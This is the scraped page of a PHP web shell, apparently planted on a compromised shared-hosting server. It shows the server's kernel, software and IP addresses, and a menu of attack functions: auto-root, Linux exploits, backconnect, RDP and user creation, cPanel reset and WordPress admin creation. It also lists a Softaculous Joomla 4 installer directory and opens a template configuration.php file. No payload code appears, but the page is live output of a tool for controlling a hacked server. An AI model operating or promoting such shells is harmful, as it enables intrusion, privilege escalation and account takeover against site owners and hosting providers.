Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.119.127.13
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
joomla4 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
4.3.0-2023-03-28.sql
139
B
-rw-r--r--
_4.3.0-2023-03-28.sql
68
B
-rw-r--r--
clone.php
3.98
KB
-rw-r--r--
configuration.php
1.99
KB
-rw-r--r--
edit.php
5.82
KB
-rw-r--r--
edit.xml
629
B
-rw-r--r--
extend.php
8.76
KB
-rw-r--r--
fileindex.php
236
B
-rw-r--r--
import.php
8.69
KB
-rw-r--r--
info.xml
3.53
KB
-rw-r--r--
install.js
1.33
KB
-rw-r--r--
install.php
20.72
KB
-rw-r--r--
install.xml
3.23
KB
-rw-r--r--
joomla4.sql
302.12
KB
-rw-r--r--
joomla4.zip
29.91
MB
-rw-r--r--
md5
13.24
KB
-rw-r--r--
notes.txt
3.43
KB
-rw-r--r--
restore.php
2.24
KB
-rw-r--r--
sign_on.php
2.35
KB
-rw-r--r--
update_pass.php
497
B
-rw-r--r--
upgrade.php
24.74
KB
-rw-r--r--
upgrade.xml
630
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : configuration.php
<?php class JConfig { public $offline = false; public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.'; public $display_offline_message = 1; public $offline_image = ''; public $sitename = '[[site_name]]'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = 20; public $access = 1; public $debug = false; public $debug_lang = false; public $debug_lang_const = true; public $dbtype = 'mysqli'; public $host = '[[softdbhost]]'; public $user = '[[softdbuser]]'; public $password = '[[softdbpass]]'; public $db = '[[softdb]]'; public $dbprefix = '[[dbprefix]]'; public $dbencryption = 0; public $dbsslverifyservercert = false; public $dbsslkey = ''; public $dbsslcert = ''; public $dbsslca = ''; public $dbsslcipher = ''; public $force_ssl = 0; public $live_site = ''; public $secret = '[[secret]]'; public $gzip = false; public $error_reporting = 'default'; public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}'; public $offset = 'UTC'; public $mailonline = true; public $mailer = 'mail'; public $mailfrom = '[[admin_email]]'; public $fromname = '[[site_name]]'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = false; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = 25; public $caching = 0; public $cache_handler = 'file'; public $cachetime = 15; public $cache_platformprefix = false; public $MetaDesc = '[[site_desc]]'; public $MetaAuthor = true; public $MetaVersion = false; public $robots = ''; public $sef = true; public $sef_rewrite = false; public $sef_suffix = false; public $unicodeslugs = false; public $feed_limit = 10; public $feed_email = 'none'; public $log_path = '[[softpath]]/administrator/logs'; public $tmp_path = '[[softpath]]/tmp'; public $lifetime = 15; public $session_handler = 'database'; public $shared_session = false; public $session_metadata = true; }
Close